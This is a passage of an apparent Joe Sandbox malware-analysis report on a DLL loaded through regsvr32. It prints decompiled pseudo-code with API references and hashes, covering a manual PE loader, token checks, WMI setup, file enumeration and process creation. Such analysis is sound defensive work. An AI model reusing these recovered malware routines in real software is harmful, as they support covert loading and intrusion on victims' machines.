        				return  ~( ~_t11) - 1;
        			}

        APIs
        • memset.MSVCRT ref: 1000AE85
        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CreateProcessmemset
        • String ID:
        • API String ID: 2296119082-0
        • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
        • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
        • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
        • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 364 1000ccc0-1000ccce 365 1000ccd0-1000ccd1 364->365 366 1000cd1f-1000cd32 Sleep 364->366 367 1000ccd3-1000ccdf 365->367 368 1000cce1-1000cce7 367->368 369 1000cd15-1000cd1c 367->369 370 1000ccea-1000ccff lstrcmpi 368->370 369->367 371 1000cd1e 369->371 372 1000cd10-1000cd13 370->372 373 1000cd01-1000cd0c 370->373 371->366 372->369 373->370 374 1000cd0e 373->374 374->369
        C-Code - Quality: 100%
        			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
        				CHAR* _v8;
        				int _t28;
        				signed int _t31;
        				signed int _t34;
        				signed int _t35;
        				void* _t38;
        				signed int* _t41;
        
        				_t41 = _a8;
        				_t31 = 0;
        				if(_t41[1] > 0) {
        					_t38 = 0;
        					do {
        						_t3 =  &(_t41[2]); // 0xe6840d8b
        						_t34 =  *_t3;
        						_t35 = 0;
        						_a8 = 0;
        						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
        							_v8 = _a4 + 0x24;
        							while(1) {
        								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
        								_t14 =  &(_t41[2]); // 0xe6840d8b
        								_t34 =  *_t14;
        								if(_t28 == 0) {
        									break;
        								}
        								_t35 = _a8 + 1;
        								_a8 = _t35;
        								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
        									continue;
        								} else {
        								}
        								goto L8;
        							}
        							 *_t41 =  *_t41 |  *(_t34 + _t38);
        						}
        						L8:
        						_t31 = _t31 + 1;
        						_t38 = _t38 + 0x10;
        						_t20 =  &(_t41[1]); // 0x1374ff85
        					} while (_t31 <  *_t20);
        				}
        				Sleep(0xa);
        				return 1;
        			}

        APIs
        • lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
        • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Sleeplstrcmpi
        • String ID:
        • API String ID: 1261054337-0
        • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
        • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
        • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
        • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 375 10005e96-10005eb5 ExitProcess
        C-Code - Quality: 100%
        			E10005E96() {
        				intOrPtr _t3;
        
        				_t3 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
        				ExitProcess(0);
        			}





        APIs
        • ExitProcess.KERNEL32(00000000), ref: 10005EAD
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: ExitProcess
        • String ID:
        • API String ID: 621844428-0
        • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
        • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
        • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
        • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 377 100085ef-10008603 HeapCreate
        C-Code - Quality: 100%
        			E100085EF() {
        				void* _t1;
        
        				_t1 = HeapCreate(0, 0x80000, 0); // executed
        				 *0x1001e768 = _t1;
        				return _t1;
        			}





        APIs
        • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
        • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
        • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
        • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 47%
        			E1000BA62(void* __ecx, void* __esi) {
        				intOrPtr* _v8;
        				char _v12;
        				void* _v16;
        				char _v20;
        				char _v24;
        				short _v28;
        				char _v32;
        				void* _t20;
        				intOrPtr* _t21;
        				intOrPtr _t29;
        				intOrPtr _t31;
        				intOrPtr* _t33;
        				intOrPtr _t34;
        				char _t37;
        				union _TOKEN_INFORMATION_CLASS _t44;
        				char _t45;
        				intOrPtr* _t48;
        
        				_t37 = 0;
        				_v28 = 0x500;
        				_t45 = 0;
        				_v32 = 0;
        				_t20 = E1000B946(__ecx);
        				_v16 = _t20;
        				if(_t20 != 0) {
        					_push( &_v24);
        					_t44 = 2;
        					_t21 = E1000B998(_t44); // executed
        					_t48 = _t21;
        					_v20 = _t48;
        					if(_t48 == 0) {
        						L10:
        						CloseHandle(_v16);
        						if(_t48 != 0) {
        							E1000861A( &_v20, _t37);
        						}
        						return _t45;
        					}
        					_push( &_v12);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0x220);
        					_push(0x20);
        					_push(2);
        					_push( &_v32);
        					_t29 =  *0x1001e68c; // 0x219fc68
        					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
        						goto L10;
        					}
        					if( *_t48 <= 0) {
        						L9:
        						_t31 =  *0x1001e68c; // 0x219fc68
        						 *((intOrPtr*)(_t31 + 0x10))(_v12);
        						_t37 = 0;
        						goto L10;
        					}
        					_t9 = _t48 + 4; // 0x4
        					_t33 = _t9;
        					_v8 = _t33;
        					while(1) {
        						_push(_v12);
        						_push( *_t33);
        						_t34 =  *0x1001e68c; // 0x219fc68
        						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
        							break;
        						}
        						_t37 = _t37 + 1;
        						_t33 = _v8 + 8;
        						_v8 = _t33;
        						if(_t37 <  *_t48) {
        							continue;
        						}
        						goto L9;
        					}
        					_t45 = 1;
        					goto L9;
        				}
        				return _t20;
        			}





















        APIs
          • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
          • Part of subcall function 1000B946: OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
          • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
          • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
          • Part of subcall function 1000B946: OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
          • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
          • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
        • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
        • String ID:
        • API String ID: 1020899596-0
        • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
        • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
        • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
        • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E1000BA05() {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr _t15;
        				void* _t16;
        				void* _t18;
        				void* _t21;
        				intOrPtr _t22;
        				void* _t24;
        				void* _t30;
        
        				_v8 = _v8 & 0x00000000;
        				_t15 =  *0x1001e68c; // 0x219fc68
        				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
        				if(_t16 != 0) {
        					_v12 = _v12 & 0x00000000;
        					_t18 = E1000B998(1,  &_v12); // executed
        					_t30 = _t18;
        					if(_t30 != 0) {
        						CloseHandle(_v8);
        						_t21 = _t30;
        					} else {
        						if(_v8 != _t18) {
        							_t22 =  *0x1001e684; // 0x219faa0
        							 *((intOrPtr*)(_t22 + 0x30))(_v8);
        						}
        						_t21 = 0;
        					}
        					return _t21;
        				} else {
        					return _t16;
        				}
        			}













        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
        • Instruction ID: 27834edd58ae92e11893d12f29fcf0d32ff10038b2ecb69362011e86f4a7d187
        • Opcode Fuzzy Hash: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
        • Instruction Fuzzy Hash: 58F06432A10619EFEB10DBA4C98AE9E77F8EB453D9F5280A8F001E7155EB70DE009B51
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 30%
        			E1000D523(void* __ecx) {
        				char _v8;
        				void* _v12;
        				char* _t15;
        				intOrPtr* _t16;
        				void* _t21;
        				intOrPtr* _t23;
        				intOrPtr* _t24;
        				intOrPtr* _t25;
        				void* _t30;
        				void* _t33;
        
        				_v12 = 0;
        				_v8 = 0;
        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
        				_t15 =  &_v12;
        				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
        				if(_t15 < 0) {
        					L5:
        					_t23 = _v8;
        					if(_t23 != 0) {
        						 *((intOrPtr*)( *_t23 + 8))(_t23);
        					}
        					_t24 = _v12;
        					if(_t24 != 0) {
        						 *((intOrPtr*)( *_t24 + 8))(_t24);
        					}
        					_t16 = 0;
        				} else {
        					__imp__#2(__ecx);
        					_t25 = _v12;
        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
        					if(_t21 < 0) {
        						goto L5;
        					} else {
        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
        						if(_t21 < 0) {
        							goto L5;
        						} else {
        							_t16 = E10008604(8);
        							if(_t16 == 0) {
        								goto L5;
        							} else {
        								 *((intOrPtr*)(_t16 + 4)) = _v12;
        								 *_t16 = _v8;
        							}
        						}
        					}
        				}
        				return _t16;
        			}














        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
        • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
        • SysAllocString.OLEAUT32(00000000), ref: 1000D569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 2855449287-0
        • Opcode ID: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
        • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
        • Opcode Fuzzy Hash: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
        • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 52%
        			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
        				signed int _v5;
        				signed short _v12;
        				intOrPtr* _v16;
        				signed int* _v20;
        				intOrPtr _v24;
        				unsigned int _v28;
        				signed short* _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr* _v40;
        				signed short* _v44;
        				intOrPtr _v48;
        				unsigned int _v52;
        				intOrPtr _v56;
        				_Unknown_base(*)()* _v60;
        				signed int _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				unsigned int _v76;
        				intOrPtr _v80;
        				signed int _v84;
        				intOrPtr _v88;
        				signed int _t149;
        				void* _t189;
        				signed int _t194;
        				signed int _t196;
        				intOrPtr _t236;
        
        				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        				_v24 = _v72;
        				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
        				_v56 = _t236;
        				if(_t236 == 0) {
        					L13:
        					while(0 != 0) {
        					}
        					_push(8);
        					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
        						L35:
        						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
        						while(0 != 0) {
        						}
        						if(_a12 != 0) {
        							 *_a12 = _v68;
        						}
        						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
        						return _v68(_a4, 1, _a8);
        					}
        					_v84 = 0x80000000;
        					_t149 = 8;
        					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						if(_v36 == 0) {
        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						}
        						if(_v36 != 0) {
        							if( *_v16 == 0) {
        								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
        							} else {
        								_v20 =  *_v16 + _a4;
        							}
        							_v64 = _v64 & 0x00000000;
        							while( *_v20 != 0) {
        								if(( *_v20 & _v84) == 0) {
        									_v88 =  *_v20 + _a4;
        									_v60 = GetProcAddress(_v36, _v88 + 2);
        								} else {
        									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
        								}
        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
        									 *_v20 = _v60;
        								} else {
        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
        								}
        								_v20 =  &(_v20[1]);
        								_v64 = _v64 + 4;
        							}
        							_v16 = _v16 + 0x14;
        							continue;
        						} else {
        							_t189 = 0xfffffffd;
        							return _t189;
        						}
        					}
        					goto L35;
        				}
        				_t194 = 8;
        				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
        				_t196 = 8;
        				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
        				while(0 != 0) {
        				}
        				while(_v48 > 0) {
        					_v28 = _v44[2];
        					_v48 = _v48 - _v28;
        					_v28 = _v28 - 8;
        					_v28 = _v28 >> 1;
        					_v32 =  &(_v44[4]);
        					_v80 = _a4 +  *_v44;
        					_v52 = _v28;
        					while(1) {
        						_v76 = _v52;
        						_v52 = _v52 - 1;
        						if(_v76 == 0) {
        							break;
        						}
        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
        						_v12 =  *_v32 & 0xfff;
        						_v40 = (_v12 & 0x0000ffff) + _v80;
        						if((_v5 & 0x000000ff) != 3) {
        							if((_v5 & 0x000000ff) == 0xa) {
        								 *_v40 =  *_v40 + _v56;
        							}
        						} else {
        							 *_v40 =  *_v40 + _v56;
        						}
        						_v32 =  &(_v32[1]);
        					}
        					_v44 = _v32;
        				}
        				goto L13;
        			}






























        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
        • LoadLibraryA.KERNEL32(?), ref: 10012C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
        • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
        • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
        • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
        				char _v12;
        				WCHAR* _v16;
        				short _v560;
        				short _v562;
        				struct _WIN32_FIND_DATAW _v608;
        				WCHAR* _t27;
        				void* _t31;
        				int _t36;
        				intOrPtr _t37;
        				intOrPtr _t44;
        				void* _t48;
        				intOrPtr _t49;
        				void* _t51;
        				intOrPtr _t56;
        				void* _t61;
        				char _t62;
        				void* _t63;
        				void* _t64;
        				void* _t65;
        				void* _t80;
        
        				_t80 = __fp0;
        				_push(0);
        				_t51 = __ecx;
        				_push(L"\\*");
        				_t27 = E100092E5(__ecx);
        				_t65 = _t64 + 0xc;
        				_v16 = _t27;
        				if(_t27 == 0) {
        					return _t27;
        				}
        				_t61 = FindFirstFileW(_t27,  &_v608);
        				if(_t61 == 0xffffffff) {
        					L18:
        					return E1000861A( &_v16, 0xfffffffe);
        				}
        				_t31 = 0x2e;
        				do {
        					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
        						if((_v608.dwFileAttributes & 0x00000010) != 0) {
        							L14:
        							_push(0);
        							_push( &(_v608.cFileName));
        							_push("\\");
        							_t62 = E100092E5(_t51);
        							_t65 = _t65 + 0x10;
        							_v12 = _t62;
        							if(_t62 != 0) {
        								_t56 =  *0x1001e684; // 0x219faa0
        								 *((intOrPtr*)(_t56 + 0xb4))(1);
        								_push(1);
        								_push(1);
        								_push(0);
        								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
        								_t65 = _t65 + 0x1c;
        								E1000861A( &_v12, 0xfffffffe);
        							}
        							goto L16;
        						}
        						_t63 = 0;
        						do {
        							_t10 = _t63 + 0x1001e78c; // 0x0
        							_push( *_t10);
        							_push( &(_v608.cFileName));
        							_t44 =  *0x1001e690; // 0x219fd40
        							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
        								goto L12;
        							}
        							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
        							_t65 = _t65 + 0xc;
        							if(_t48 == 0) {
        								break;
        							}
        							_t49 =  *0x1001e684; // 0x219faa0
        							 *((intOrPtr*)(_t49 + 0xb4))(1);
        							L12:
        							_t63 = _t63 + 4;
        						} while (_t63 < 4);
        						if((_v608.dwFileAttributes & 0x00000010) == 0) {
        							goto L16;
        						}
        						goto L14;
        					}
        					L16:
        					_t36 = FindNextFileW(_t61,  &_v608);
        					_t31 = 0x2e;
        				} while (_t36 != 0);
        				_t37 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t37 + 0x78))(_t61);
        				goto L18;
        			}
























        APIs
        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
        • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: FileFind$FirstNext
        • String ID:
        • API String ID: 1690352074-0
        • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
        • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
        • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
        • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetProcessHeap.KERNEL32(00000000,00000744), ref: 1002966B
        • RtlAllocateHeap.NTDLL(00000000), ref: 10029672
        Memory Dump Source
        • Source File: 00000004.00000002.516656148.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: Heap$AllocateProcess
        • String ID:
        • API String ID: 1357844191-0
        • Opcode ID: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
        • Instruction ID: f2d45d7e56076847abda7dacf9d916d46c2c24713d6d1dcbf256efb98a2a20cf
        • Opcode Fuzzy Hash: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
        • Instruction Fuzzy Hash: C8318175A002A08BE7388F39CDEC5A97BF1FBC4316715436AD485A72A5D2BA5881CB60
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
        • String ID:
        • API String ID: 1518329722-0
        • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
        • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
        • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
        • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E1000A51A(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
        				CHAR* _v8;
        				struct HRSRC__* _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _t15;
        				signed int _t17;
        				struct HRSRC__* _t20;
        				intOrPtr _t21;
        				intOrPtr _t22;
        				intOrPtr* _t23;
        				intOrPtr* _t26;
        				struct HINSTANCE__* _t28;
        				intOrPtr _t30;
        				intOrPtr* _t33;
        				signed int _t35;
        				intOrPtr _t37;
        				void* _t38;
        				void* _t39;
        				void* _t43;
        
        				_t43 = __fp0;
        				_t29 = __ecx;
        				_v8 = __edx;
        				_t28 = __ecx;
        				_v20 = 0xa;
        				_t35 = 0;
        				_v16 = 3;
        				while(1) {
        					_t15 =  *0x1001e688; // 0x2120590
        					_t17 = E1001242D(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
        					_t29 =  *0x1001e688; // 0x2120590
        					_t39 = _t39 + 0xc;
        					_t20 = FindResourceA(_t28, _v8, _t17 *  *(_t29 + 0x644) +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
        					_v12 = _t20;
        					if(_t20 != 0) {
        						break;
        					}
